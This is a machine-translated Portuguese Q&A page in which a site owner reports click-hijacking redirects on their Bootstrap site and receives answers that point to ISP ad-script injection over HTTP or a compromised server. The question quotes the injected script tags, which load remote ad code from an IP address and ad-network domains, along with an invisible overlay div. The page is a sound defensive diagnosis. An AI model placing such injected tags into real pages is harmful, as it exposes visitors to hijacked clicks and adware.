it-swarm.dev

scripts desconhecidos estão sendo executados e redirecionados em cliques para sites desconhecidos

Problema: - Às vezes, ao clicar no menu NAVBAR ou em qualquer div no meu site de bootstrap, ele redireciona para anúncios ou links desconhecidos em uma nova aba algo parecido com isto. 

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Links importados do arquivo hospedado: -  

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

O que recebi na Inspeção: -  

Eu verifiquei meu código várias vezes quando não há redirecionamento no menu clicando..Eu não encontrei nada suspeito ... MAS ENTÃO quando eu tenho redirecionados links no clique, eu verifiquei o meu código no navegador e eu posso ver claramente alguns fontes de script adicionadas aos meus arquivos (pode ver no modo de inspeção em navegadores apenas) .Eles não estão escritos no meu código. Partes desconhecidas do meu código são ..

1) AQUI Os 2 scripts a seguir estão substituindo o script js/jquery.min.js na tag head  

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22Host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) Esse aqui está sendo adicionado à tag body logo após eu ter importado o google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) Este também está na tag body.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) Ao inspecionar o link de redirecionamento. A informação do HEADERS: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

O que eu tentei: -  

Meu código está limpo e não há script que esteja redirecionando para algum lugar. Pode ser o meu navegador ou o Windows a ser comprometida. Eu verifiquei site de 3 navegadores Edge, CHROME, FIREFOX .. tenho o mesmo problema. então eu atualizei para o Windows 10 do Win7 e fiz uma nova instalação. Mas nada aconteceu. Então eu pensei em pedir suporte ao Hostgator se o servidor estivesse comprometido eles respondiam ok do seu fim ... Instalei o malwarebytes e todos os softwares para resolvê-lo ... mas eles só avisam que o chrome/firefox/Edge está redirecionando para ID de saída com algum nome de domínio principalmente go.oclasrv.com e não fazer nada. 

**

QUALQUER SOLUÇÃO ???

**

ATUALIZAÇÃO: -

Eu obtive um redirecionamento semelhante no link de feedback de suporte da Hostgator.

Ao perceber, aqui o nome de domínio em string é substituído por rateus.in Zoneid = 1492761 é o mesmo que link inseguro eu abro .. Também cb = xxxxxxxxxxxx e tm = xxxxxxxxxxx é alterado para diferentes links e impressões digitais = c2VwLW5vLXJlZGlyZWN0 é o mesmo para todos os links que abro.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22Host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

Meu sistema operacional está completamente atualizado para o WIN10 pro e eu instalei apenas o Chrome sem nenhum plug-in ...

O problema é independente do navegador, pois obtive os mesmos resultados no Edge e no Firefox.

QUALQUER ESPECIALISTA QUE PODE ME AJUDAR AQUI

9
aman

Este parece ser um caso de ISP injetando arquivos JavaScript. Você está, por acaso, na banda larga BSNL ?. Nos últimos dias, o BSNL parece estar injetando o Adware em sites HTTP (não criptografados).

A única solução que eu sei é hospedar seu site em https OR alterar seu ISP.

8
Jayson Chacko

Esse problema que você está tendo é do lado do servidor. Provavelmente nada está errado com o seu código, no entanto, o servidor está infectado com malware injetando esse código ruim em seu site.

Para resolver isso, eu faria um backup do código que você escreveu, alteraria suas senhas de hospedagem de FTP, apagaria seu servidor e adicionaria seu código de volta. Se isso não resolver o problema, alteraria os provedores de hospedagem.

1
Jake Chasan

Se você vir um script desconhecido injetado a partir dos seguintes IPs, então é o arquivo de script injetado pelo BSNL ISP.

61.0.245.90, 117.205.13.171

Esses scripts são injetados apenas quando você visita sites HTTP. HTTPS envolve Segurança da Camada de Transporte para que não seja adulterado pelo ISP. 

Os arquivos de script deste IP são apenas um canal, que faz o download de mais scripts AD de diferentes mídias do AD. A maior parte desta mídia AD segue publicidade intrusiva, seqüestrando os cliques do mouse do usuário para abrir seus pop-ups. 

BSNL desculpa para tal atividade é que é um recurso para melhorar a experiência de navegação para seus assinantes. Há um post detalhado escrito em BSNL injetando tais scripts e como pará-los. 

0
David Chelliah